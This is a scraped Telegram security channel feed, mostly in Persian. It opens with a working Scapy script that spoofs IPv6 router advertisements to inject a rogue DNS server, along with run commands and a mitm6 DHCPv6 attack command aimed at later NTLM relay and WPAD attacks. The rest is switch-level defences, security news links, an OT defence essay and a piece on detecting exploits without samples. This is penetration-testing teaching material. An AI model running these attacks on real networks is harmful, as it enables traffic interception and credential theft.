#!/usr/bin/env python3
from scapy.all import *
import argparse
def send_rdns_spoof(args):
ra = IPv6(
src=args.llip,
dst="ff02::1",
hlim=255) / ICMPv6ND_RA(routerlifetime=0) / ICMPv6NDOptRDNSS(dns=[args.dns], lifetime=args.lifetime)
print(f"[+] Sending RDNSS RA on {args.interface}")
print(f" Source LL IP: {args.llip}")
print(f" DNS: {args.dns}")
print(f" Lifetime: {args.lifetime}s")
print(f" Interval: {args.interval}s")
send(ra, iface=args.interface, loop=1, inter=args.interval)
def main():
parser = argparse.ArgumentParser(denoscription="RDNSS Spoofing via IPv6 RA")
parser.add_argument("-i", "--interface", required=True, help="Network interface (e.g. eth0)")
parser.add_argument("--llip", required=True, help="Link-local IPv6 address (source IP)")
parser.add_argument("--dns", required=True, help="DNS server to inject (IPv6 address)")
parser.add_argument("--lifetime", type=int, default=600, help="RDNSS option lifetime (default: 600 seconds)")
parser.add_argument("--interval", type=int, default=5, help="Interval between packets in seconds")
args = parser.parse_args()
send_rdns_spoof(args)
if __name__ == "__main__":
main()
نحوه اجرا:
sudo python3 rdnss.py -i eth0 --llip fe80::20c:29ff:fef0:470d --dns fe80::20c:29ff:fef0:470d --lifetime 100 --interval 30
برای بازگرداندن تغییرات و حذف DNS جعلی از سیستم قربانی، کافی است اسکریپت را با
lifetime 0 اجرا کنید:sudo python3 rdnss.py -i eth0 --llip fe80::20c:29ff:fef0:470d --dns fe80::20c:29ff:fef0:470d --lifetime 0
این حمله از
mitm6 انعطافپذیرتر است، زیرا به شما امکان کنترل دقیق بر روی پارامترهای بسته RA و زمانبندی حمله را میدهد.رهگیری DNS با DHCPv6 (حمله mitm6)
ابزار mitm6 یکی از محبوبترین ابزارها برای حمله به شبکههای ویندوزی است. این ابزار با تزریق بستههای DHCPv6، خود را به عنوان یک سرور DHCPv6 قانونی جا زده و آدرس DNS جعلی را در سطح IPv6 به کلاینتها تحمیل میکند.
معمولاً ویندوز به صورت دورهای بستههای DHCPv6 Solicit ارسال میکند تا یک سرور در شبکه پیدا کند. mitm6 به این درخواستها با یک بسته Advertise پاسخ میدهد و آدرس خود را به عنوان سرور DNS معرفی میکند.
اجرای حمله:
sudo mitm6 -i eth0 --no-ra
پس از این حمله، آدرس link-local مهاجم به عنوان سرور DNS در سیستم قربانی ثبت میشود و راه را برای حملات بعدی مانند NTLM Relay**، رهگیری درخواستهای DNS و حمله به WPAD باز میکند.
**چگونه از خود دفاع کنیم
برای جلوگیری از حملات جعل هویت در IPv6، مکانیزمهای زیر در سطح لایه ۲ (سوئیچ) به کار میروند:
۔**RA Guard**: فیلتر کردن بستههای RA در سطح سوئیچ.
۔**DHCPv6 Guard**: مسدود کردن سرورهای DHCPv6 غیرمجاز روی پورتهای خاص.
۔**ND Inspection**: فیلتر کردن پیامهای NDP, RA و دیگر پیامهای ICMPv6 بر اساس الگوها.
اما در دنیای واقعی:
* این مکانیزمها اغلب به صورت پیشفرض غیرفعال هستند.
* در شبکههای ترکیبی IPv4/IPv6 به درستی پیکربندی نمیشوند.
* روی سوئیچهای قدیمی یا ارزانقیمت (بهویژه در شبکههای Wi-Fi) کار نمیکنند.
در نتیجه، حتی با وجود فعال بودن IPv6، لایههای حفاظتی یا غایب یا ناکارآمد هستند، که این حملات را در زیرساختهای واقعی کاملاً ممکن میسازد.
کلام آخر
بسیاری معتقدند بهترین راه حل، غیرفعال کردن کامل IPv6 است، اما این کار مشکل را حل نمیکند. مهم است که بفهمیم این فناوری چگونه کار میکند و چه اقدامات متقابلی در دسترس است. تحلیل مداوم و مطالعه عمیق پروتکلها، مهارتی کلیدی است که بارها به کارتان خواهد آمد.
نویسنده اصلی مقاله: Magama Bazarov
@NullError_ir 📢
exploit.org
Legless: IPv6 Penetration Testing
IPv6 security has recently become a pressing issue. In this article, I will discuss attacks on IPv6 and methods of protection.
Forwarded from Mehraz Logs
mehrazino.github.io
Telegram Cybersecurity Channels
فهرست کانالهای تلگرام مرتبط با امنیت سایبری
لیست چنلهای تلگرام فعال در حوزه امنیت سایبری و OSINT
(ایرانی و خارجی)
https://mehrazino.github.io/tg-cybersec
#useful
(ایرانی و خارجی)
https://mehrazino.github.io/tg-cybersec
#useful
❤1
❏ </Mr. SAM/> ❏
░▒▓█ cybersecurity █▓▒░
Microsoft Copilot Agent Policy Let Any Users Access AI Agents
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ cybersecurity █▓▒░
Microsoft Copilot Agent Policy Let Any Users Access AI Agents
🔗 ➢➣➤ More ...
@NullError_ir 📢
Cyber Security News
Microsoft Copilot Agent Policy Let Any Users Access AI Agents
Shortly after the May 2025 rollout of 107 Copilot Agents in Microsoft 365 tenants, security specialists have discovered that the “Data Access” restriction meant to block agent availability is being ignored.
❏ </Mr. SAM/> ❏
░▒▓█ SecurityWeek █▓▒░
Arch Linux Project Responding to Week-Long DDoS Attack
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ SecurityWeek █▓▒░
Arch Linux Project Responding to Week-Long DDoS Attack
🔗 ➢➣➤ More ...
@NullError_ir 📢
SecurityWeek
Arch Linux Project Responding to Week-Long DDoS Attack
The Arch Linux Project has been targeted in a DDoS attack that disrupted its website, repository, and forums.
❏ </Mr. SAM/> ❏
░▒▓█ hackday █▓▒░
DIY Telescope Mount for Stellar Tracking
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ hackday █▓▒░
DIY Telescope Mount for Stellar Tracking
🔗 ➢➣➤ More ...
@NullError_ir 📢
Hackaday
DIY Telescope Mount For Stellar Tracking
Pointing at stars may seem easy on the surface—just mount a telescope to a tripod and you’re done, right? As anyone who’s spent time with a telescope can tell you, it’s not that s…
❏ </Mr. SAM/> ❏
░▒▓█ افتانا █▓▒░
سوءاستفاده از زبان Go و تلگرام برای سرقت اطلاعات
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ افتانا █▓▒░
سوءاستفاده از زبان Go و تلگرام برای سرقت اطلاعات
🔗 ➢➣➤ More ...
@NullError_ir 📢
AFTANA.ir
سوءاستفاده از زبان Go و تلگرام برای سرقت اطلاعات
یک ماژول منتشرشده در مخزن رسمی Go که خود را ابزار هک SSH معرفی میکند، در واقع تلهای برای سرقت نام کاربری و گذرواژه است؛ دادههای بهدستآمده مستقیماً به ربات تلگرام مهاجم منتقل میشوند.
❏ </Mr. SAM/> ❏
░▒▓█ cybersecurity █▓▒░
Critical Tableau Server Vulnerability Let Attackers Upload Malicious Files
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ cybersecurity █▓▒░
Critical Tableau Server Vulnerability Let Attackers Upload Malicious Files
🔗 ➢➣➤ More ...
@NullError_ir 📢
Cyber Security News
Critical Tableau Server Vulnerability Let Attackers Upload Malicious Files
A critical security flaw in Tableau Server could enable attackers to upload and execute malicious files, potentially leading to complete system compromise.
❏ </Mr. SAM/> ❏
░▒▓█ TheHackersNews █▓▒░
Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ TheHackersNews █▓▒░
Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
🔗 ➢➣➤ More ...
@NullError_ir 📢
Telegram
Mr. SAM
یکشنبه
۷ ( دی = ۱۰ ) ۱٤۰٤
28 ( دسامبر = december = 12 ) 2025
تکنیکها ، کالبدشکافی ، درک عمیق ، یک قدم جلوتر ...
https://news.1rj.ru/str/boost/NullError_ir
۷ ( دی = ۱۰ ) ۱٤۰٤
28 ( دسامبر = december = 12 ) 2025
تکنیکها ، کالبدشکافی ، درک عمیق ، یک قدم جلوتر ...
https://news.1rj.ru/str/boost/NullError_ir
❏ </Mr. SAM/> ❏
░▒▓█ SecurityWeek █▓▒░
SASE Company Netskope Files for IPO
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ SecurityWeek █▓▒░
SASE Company Netskope Files for IPO
🔗 ➢➣➤ More ...
@NullError_ir 📢
SecurityWeek
SASE Company Netskope Files for IPO
Netskope has an annual recurring revenue of more than $707 million, but it’s still not profitable, reporting a net loss of $170 million in H1.
❏ </Mr. SAM/> ❏
░▒▓█ SecurityWeek █▓▒░
CISA Requests Public Feedback on Updated SBOM Guidance
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ SecurityWeek █▓▒░
CISA Requests Public Feedback on Updated SBOM Guidance
🔗 ➢➣➤ More ...
@NullError_ir 📢
SecurityWeek
CISA Requests Public Feedback on Updated SBOM Guidance
CISA has updated the Minimum Elements for a Software Bill of Materials (SBOM) guidance and is seeking public comment.
قلعه دیجیتال صنعت نفت: معماری یک دفاع عمیق در برابر تهدیدات سایبری
صنعت نفت، گاز و پتروشیمی، شاهرگ حیاتی اقتصاد جهانی، در حال تجربهی یک تحول دیجیتال عظیم است. اما این پیشرفت، شمشیر دولبهای است. همگرایی فزایندهی شبکههای فناوری اطلاعات (IT) و فناوری عملیاتی (OT)، در حالی که بهرهوری را به اوج میرساند، دروازههایی جدید به روی تهدیداتی خاموش اما ویرانگر گشوده است. دیگر دیوارهای سنتی و ایزولهسازی (Air-Gapping) به تنهایی کافی نیستند. امروز نیازمند یک معماری دفاعی عمیق (Defense-in-Depth) هستیم تا از این زیرساختهای حیاتی محافظت کنیم.
میدان نبرد مدرن: درک عمیق تهدیدات
برای ساختن یک دفاع مؤثر، ابتدا باید دشمن و میدان نبرد را به خوبی بشناسیم. چالشهای امروز بسیار پیچیدهتر از یک ویروس ساده هستند:
همگرایی IT/OT: مرز بین دنیای اداری و صنعتی در حال محو شدن است. یک ایمیل فیشینگ که کارمندی در بخش IT باز میکند، میتواند نقطه شروع حملهای باشد که در نهایت به قلب سیستمهای کنترل صنعتی (ICS) و SCADA در بخش OT نفوذ کرده و یک فاجعه عملیاتی رقم بزند.
آسیبپذیری سیستمهای موروثی (Legacy Systems): بسیاری از کنترلرها (PLC) و سیستمهای مانیتورینگ (HMI) بر پایه سیستمعاملهای منسوخی مانند Windows XP کار میکنند که دیگر پشتیبانی امنیتی نمیشوند. فرآیند اعمال وصلههای امنیتی (Patch Management) در این محیطها به دلیل حساسیت عملیاتی و نیاز به تأییدیه فروشنده، بسیار دشوار و کند است.
پروتکلهای ناامن صنعتی: پروتکلهای کلاسیک صنعتی مانند Modbus و DNP3، برای دنیایی طراحی شده بودند که در آن امنیت سایبری یک دغدغه نبود. این پروتکلها فاقد رمزنگاری و اصالتسنجی هستند و یک مهاجم حاضر در شبکه میتواند به راحتی دستورات کنترلی را جعل کند.
زنجیره تأمین و تهدیدات فیزیکی: حمله فقط از اینترنت نیست. یک حافظه USB آلوده که توسط یک پیمانکار به شبکه متصل میشود، میتواند تمام ساختار دفاعی شما را دور بزند. حمله معروف استاکسنت (Stuxnet) دقیقاً به همین روش آغاز شد و نشان داد که ایزولهسازی فیزیکی به تنهایی کافی نیست.
نقشه راه امنیت: ۵ ستون استراتژیک برای یک دفاع همهجانبه
مقابله با این تهدیدات پیچیده، نیازمند یک استراتژی چندلایه و هوشمند است که در ادامه، ۵ ستون اصلی آن را بررسی میکنیم.
۱. معماری امن شبکه: قلعه خود را اصولی بسازید!
این اولین و حیاتیترین قدم است. یک شبکه مسطح (Flat Network) مانند یک زمین باز و بدون سنگر است. معماری صحیح به معنای بخشبندی (Segmentation) دقیق شبکه است.
جزئیات فنی: این بخشبندی باید بر اساس مدل مرجع Purdue یا استاندارد ISA/IEC 62443 انجام شود. مهمترین اصل، ایجاد یک منطقه غیرنظامی صنعتی (Industrial DMZ) بین شبکه IT (سطح ۴ و ۵) و شبکه OT (سطح ۰ تا ۳) است. تمام ارتباطات باید از این منطقه حائل عبور کرده و به شدت کنترل شوند. برای حداکثر امنیت در انتقال داده از OT به IT، میتوان از دروازههای یکطرفه (Unidirectional Gateways) استفاده کرد.
۲. امنسازی سیستمها: زره هر سرباز را مستحکم کنید!
هر دستگاه در شبکه (HMI، سرور، ایستگاه مهندسی) یک سرباز در خط مقدم شماست. با کاهش سطح حمله یا Hardening**، زره این سربازان را تقویت میکنید.
**جزئیات فنی: به جای تکیه بر آنتیویروسهای سنتی، از راهکار لیست سفید برنامهها (Application Whitelisting) استفاده کنید تا فقط به نرمافزارهای مجاز اجازه اجرا داده شود. تمام پورتها و سرویسهای غیرضروری را غیرفعال کرده و کنترل دسترسی را بر پایه نقش (RBAC) و با احراز هویت چندعاملی (MFA)**، به خصوص برای دسترسیهای راه دور، پیادهسازی کنید.
۳. کنترل دروازههای ورودی: از نفوذ غافلگیرانه جلوگیری کنید!
همانطور که استاکسنت نشان داد، حافظههای USB و لپتاپهای پیمانکاران، اسبهای تروای دنیای مدرن هستند.
جزئیات فنی: پیادهسازی کیوسکهای پاکسازی مدیا (Media Sanitization Kiosks) یک راهکار عالی است. هر حافظه قابل حمل قبل از ورود به محیط OT، باید در این ایستگاههای ایزوله اسکن و پاکسازی شود. همچنین، باید با استفاده از پالیسیهای سختگیرانه (GPO)، استفاده از پورتهای USB را در سیستمهای حساس محدود کرد.
۴. پایش و تشخیص تهدید: دیدهبانهای هوشمند مستقر کنید!
شما نمیتوانید با تهدیدی که نمیبینید، مبارزه کنید. ابزارهای امنیتی IT، زبان دنیای OT را نمیفهمند. شما به دیدهبانهای هوشمند و متخصص نیاز دارید.
جزئیات فنی: استقرار یک مرکز عملیات امنیت ویژه OT (OT-SOC) ضروری است. این مرکز باید مجهز به ابزارهای پایش پسیو شبکه باشد که با تحلیل عمیق بستهها (DPI) برای پروتکلهای صنعتی، هرگونه ناهنجاری یا رفتار مشکوک (مانند تلاش برای آپدیت Firmware یک PLC در خارج از برنامه) را فوراً شناسایی کنند.
@NullError_ir 📢
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
۵. ارزیابی امنیتی و توانمندسازی نیروی انسانی: نقاط ضعف را قبل از دشمن پیدا کنید!
ضعیفترین حلقه در زنجیره امنیت، همیشه انسان است؛ اما همین حلقه میتواند به قویترین سپر دفاعی شما نیز تبدیل شود.
جزئیات فنی: به جای اسکن فعال که میتواند به تجهیزات حساس OT آسیب بزند، از روشهای ارزیابی آسیبپذیری پسیو استفاده کنید. تستهای نفوذ (Penetration Testing) را با برنامهریزی دقیق و توسط تیمهای متخصص در امنیت OT انجام دهید. و مهمتر از همه، با برگزاری دورههای آموزشی و آگاهیرسانی مستمر، کارکنان خود را به عنوان اولین خط دفاعی در برابر حملات فیشینگ و مهندسی اجتماعی توانمند سازید.
کلام آخر
امنیت سایبری در صنعت نفت و گاز یک مقصد نیست، بلکه یک سفر دائمی است. این یک فرآیند مستمر از ارزیابی، تقویت و انطباق در برابر تهدیدات نوظهور است. با پیادهسازی یک استراتژی دفاعی عمیق که این پنج ستون را در بر گیرد، میتوان از این شاهرگ حیاتی در برابر خطرات دنیای دیجیتال محافظت کرده و تداوم عملیات ایمن و پایدار را تضمین نمود.
@NullError_ir 📢
ضعیفترین حلقه در زنجیره امنیت، همیشه انسان است؛ اما همین حلقه میتواند به قویترین سپر دفاعی شما نیز تبدیل شود.
جزئیات فنی: به جای اسکن فعال که میتواند به تجهیزات حساس OT آسیب بزند، از روشهای ارزیابی آسیبپذیری پسیو استفاده کنید. تستهای نفوذ (Penetration Testing) را با برنامهریزی دقیق و توسط تیمهای متخصص در امنیت OT انجام دهید. و مهمتر از همه، با برگزاری دورههای آموزشی و آگاهیرسانی مستمر، کارکنان خود را به عنوان اولین خط دفاعی در برابر حملات فیشینگ و مهندسی اجتماعی توانمند سازید.
کلام آخر
امنیت سایبری در صنعت نفت و گاز یک مقصد نیست، بلکه یک سفر دائمی است. این یک فرآیند مستمر از ارزیابی، تقویت و انطباق در برابر تهدیدات نوظهور است. با پیادهسازی یک استراتژی دفاعی عمیق که این پنج ستون را در بر گیرد، میتوان از این شاهرگ حیاتی در برابر خطرات دنیای دیجیتال محافظت کرده و تداوم عملیات ایمن و پایدار را تضمین نمود.
@NullError_ir 📢
❏ </Mr. SAM/> ❏
░▒▓█ cybersecurity █▓▒░
Hackers Can Exploit (eval) or (exec) Python Calls to Execute Malicious Code
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ cybersecurity █▓▒░
Hackers Can Exploit (eval) or (exec) Python Calls to Execute Malicious Code
🔗 ➢➣➤ More ...
@NullError_ir 📢
Cyber Security News
Hackers Can Exploit (eval) or (exec) Python Calls to Execute Malicious Code
A sophisticated obfuscation technique that threat actors are using to bypass detection systems and exploit Python's eval() and exec() functions for malicious code execution.
❏ </Mr. SAM/> ❏
░▒▓█ SecurityWeek █▓▒░
Anatsa Android Banking Trojan Now Targeting 830 Financial Apps
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ SecurityWeek █▓▒░
Anatsa Android Banking Trojan Now Targeting 830 Financial Apps
🔗 ➢➣➤ More ...
@NullError_ir 📢
SecurityWeek
Anatsa Android Banking Trojan Now Targeting 830 Financial Apps
The Anatsa Android banking trojan has expanded its target list to new countries and more cryptocurrency applications.
Forwarded from 🎄 DevTwitter | توییت برنامه نویسی
یکی از بزرگترین چالش فارسی زبانان حل کردم!
افزونه متنباز نوشتم ، اشتباهات رایج کیبورد (مثل \vs\,gds به پرسپولیس) و فینگلیش را به صورت آنی اصلاح میکند. این ابزار به عنوان دستیار دانش به ویکیپدیا و گوگل متصل است.
https://github.com/AmirMotefaker/Farsi-Smart-Assistant
@DevTwitter | <Amir Motefaker/>
افزونه متنباز نوشتم ، اشتباهات رایج کیبورد (مثل \vs\,gds به پرسپولیس) و فینگلیش را به صورت آنی اصلاح میکند. این ابزار به عنوان دستیار دانش به ویکیپدیا و گوگل متصل است.
https://github.com/AmirMotefaker/Farsi-Smart-Assistant
@DevTwitter | <Amir Motefaker/>
شناسایی اکسپلویتها بدون در اختیار داشتن نمونهی آلوده
یک چالش بزرگ برای محققان امنیتی
چرا شناسایی بدون نمونه مهم است؟
در بسیاری از حملات هدفمند (Targeted Attacks)، مهاجمان بسیار مراقب هستند که نمونههای بدافزار یا اکسپلویت آنها به دست محققان امنیتی نیفتد. اگر نمونهای در دسترس نباشد، تیمهای امنیتی نمیتوانند:
یک امضا (Signature) برای آنتیویروسها بسازند.
رفتار آن را تحلیل کنند.
از آن برای پیدا کردن قربانیان دیگر استفاده کنند.
بنابراین، محققان باید روشی پیدا کنند تا «شکار» را بدون دیدن خود «شکارچی» انجام دهند.
تکنیکهای شناسایی اکسپلویت بدون نمونه
این فرآیند مانند کار یک کارآگاه است که از روی صحنه جرم و شواهد موجود، به دنبال روش کار مجرم میگردد، حتی اگر خود مجرم را ندیده باشد. مراحل اصلی این کار به شرح زیر است:
۱. تحلیل ریشه آسیبپذیری (Vulnerability Root Cause Analysis)
همه چیز از درک عمیق خودِ حفرهی امنیتی شروع میشود.
گزارشهای فنی
محققان گزارشهای منتشر شده از سوی شرکتهایی مثل Citizen Lab یا دیگر غول های فناوری را به دقت مطالعه میکنند. برای مثال، در مورد FORCEDENTRY مشخص شد که آسیبپذیری در کتابخانه پردازش تصویر به نام
CoreGraphics و به دلیل یک سرریز عدد صحیح (Integer Overflow) رخ میدهد.مهندسی معکوس پچ (Patch Diffing)
یکی از قدرتمندترین تکنیکها، مقایسه نسخه آسیبپذیر یک نرمافزار با نسخه پچشدهی آن است. محققان با مقایسه این دو نسخه (مثلاً دو ورژن از سیستمعامل iOS)، دقیقاً متوجه میشوند که توسعهدهندگان کدام بخش از کد را برای رفع حفره تغییر دادهاند. این تغییرات، مانند یک نقشه گنج، محل دقیق آسیبپذیری و منطق آن را آشکار میکند.
۲. بازسازی اکسپلویت (Exploit Recreation)
وقتی محقق فهمید که آسیبپذیری دقیقاً چگونه کار میکند، تلاش میکند تا یک PoC (Proof-of-Concept) بسازد.
یک فایل PoC بیخطر (مثلاً یک PDF یا عکس) که دقیقاً همان ساختار معیوب اکسپلویت اصلی را دارد تا بتواند همان آسیبپذیری را فعال کند (مثلاً باعث کرش کردن برنامه شود).
هدف: این PoC به محقق یک «نمونه پاک» میدهد. حالا او یک فایل در دست دارد که میداند چه ویژگیهایی باعث فعال شدن حفره امنیتی میشود، بدون اینکه آلوده به بدافزار باشد.
۳. توسعه قوانین شناسایی (Detection Rule Development)
حالا که محقق میداند یک فایل اکسپلویتکننده چه شکلی است، میتواند برای آن یک قانون شناسایی بنویسد.
قوانین یارا (YARA Rules):
یارا ابزاری است که به محققان اجازه میدهد الگوها و مشخصههای خاصی را در فایلها جستجو کنند. برای FORCEDENTRY، محقق میتواند یک قانون یارا بنویسد که به دنبال فایلهای PDF با ساختار عجیب و خاصی بگردد که برای سوءاستفاده از آن حفره طراحی شدهاند.
ابزارسازی:
ابزاری مانند ELEGANTBOUNCER در واقع همین قوانین و منطقهای تشخیصی را در قالبی ساده و کاربردی پیادهسازی میکند. این ابزار فایلها را اسکن کرده و در صورت تطابق با الگوی اکسپلویت، هشدار میدهد.
مثال ساده برای درک بهتر:
فرض کنید یک دزد همیشه از یک نوع قفل خاص با یک سنجاق سر دستکاریشده عبور میکند. شما خود دزد را ندیدهاید و ابزار او را هم ندارید.
1. تحلیل آسیبپذیری: شما قفل را بررسی کرده و میفهمید که ضعف آن در پین شماره ۳ است.
2. بازسازی: خودتان یک سنجاق سر را طوری خم میکنید که بتواند پین شماره ۳ را دستکاری کند.
3. توسعه قانون شناسایی: یک سیستم هشدار طراحی میکنید که به محض وارد شدن ابزاری با آن شکل خاص (شکل سنجاق سر شما) به قفل، آژیر بکشد.
در این نوشته ELEGANTBOUNCER همان سیستم هشدار است که بدون دیدن دزد اصلی، روش کار او را شناسایی میکند. این دانش، اساس دفاع پیشگیرانه در امنیت سایبری مدرن است.
@NullError_ir 📢
Please open Telegram to view this post
VIEW IN TELEGRAM
Msuiche
ELEGANTBOUNCER: When You Can't Get the Samples but Still Need to Catch the Threat | Matt Suiche
The story of how ELEGANTBOUNCER was born from the frustration of not having access to in-the-wild exploit samples, and why structural analysis beats signatures for advanced mobile threats
❏ </Mr. SAM/> ❏
░▒▓█ BleepingComputer █▓▒░
New Android malware poses as antivirus from Russian intelligence agency
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ BleepingComputer █▓▒░
New Android malware poses as antivirus from Russian intelligence agency
🔗 ➢➣➤ More ...
@NullError_ir 📢
BleepingComputer
New Android malware poses as antivirus from Russian intelligence agency
A new Android malware posing as an antivirus tool software created by Russia's Federal Security Services agency (FSB) is being used to target executives of Russian businesses.
❏ </Mr. SAM/> ❏
░▒▓█ infosecwriteups █▓▒░
Blind XSS via Clipboard Paste Handling: A Detailed Guide
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ infosecwriteups █▓▒░
Blind XSS via Clipboard Paste Handling: A Detailed Guide
🔗 ➢➣➤ More ...
@NullError_ir 📢
Medium
Blind XSS via Clipboard Paste Handling: A Detailed Guide
Discover how attackers abuse clipboard paste handling to trigger Blind XSS from setup to exploitation
❏ </Mr. SAM/> ❏
░▒▓█ cybersecurity █▓▒░
Attaxion Releases Agentless Traffic Monitoring for Immediate Risk Prioritization
🔗 ➢➣➤ More ...
@NullError_ir 📢
░▒▓█ cybersecurity █▓▒░
Attaxion Releases Agentless Traffic Monitoring for Immediate Risk Prioritization
🔗 ➢➣➤ More ...
@NullError_ir 📢
Cyber Security News
Attaxion Releases Agentless Traffic Monitoring for Immediate Risk Prioritization
Attaxion announces the addition of the Agentless Traffic Monitoring capability to its exposure management platform.